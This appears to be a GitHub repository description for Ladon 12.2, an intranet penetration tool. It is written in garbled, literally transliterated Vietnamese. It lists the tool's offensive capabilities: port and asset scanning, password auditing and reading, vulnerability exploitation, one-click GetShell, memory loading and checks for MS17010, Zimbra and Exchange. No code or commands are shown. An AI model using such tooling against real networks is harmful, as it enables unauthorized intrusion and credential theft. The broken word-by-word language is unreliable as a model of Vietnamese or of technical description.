Ladon đại hình nội võng thẩm thấu công cụ, nhưng PowerShell mô khối hóa, nhưng CS cắm kiện hóa, nhưng nội tồn thêm tái, vô văn kiện rà quét. Hàm cảng rà quét, phục vụ phân biệt, internet tài sản dò xét, mật mã thẩm kế, cao nguy lỗ hổng kiểm tra đo lường, lỗ hổng lợi dụng, mật mã đọc lấy cùng với một kiện GetShell, duy trì phê lượng A đoạn /B đoạn /C đoạn cùng với vượt võng đoạn rà quét, duy trì URL, trưởng máy, vực danh danh sách rà quét chờ. Ladon 12.2 nội trí 262 cái công năng, internet tài sản dò xét mô khối 32 cái thông qua nhiều loại hiệp nghị (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) cùng với phương pháp nhanh chóng thu hoạch mục tiêu internet tồn tại trưởng máy IP, máy tính danh, công tác tổ, cùng chung tài nguyên, võng tạp địa chỉ, thao tác hệ thống phiên bản, trang web, tử vực danh, trung gian kiện, mở ra phục vụ, bộ định tuyến, tổng đài điện thoại, cơ sở dữ liệu, máy in chờ tin tức, cao nguy lỗ hổng kiểm tra đo lường 16 cái hàm MS17010, Zimbra, Exchange

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages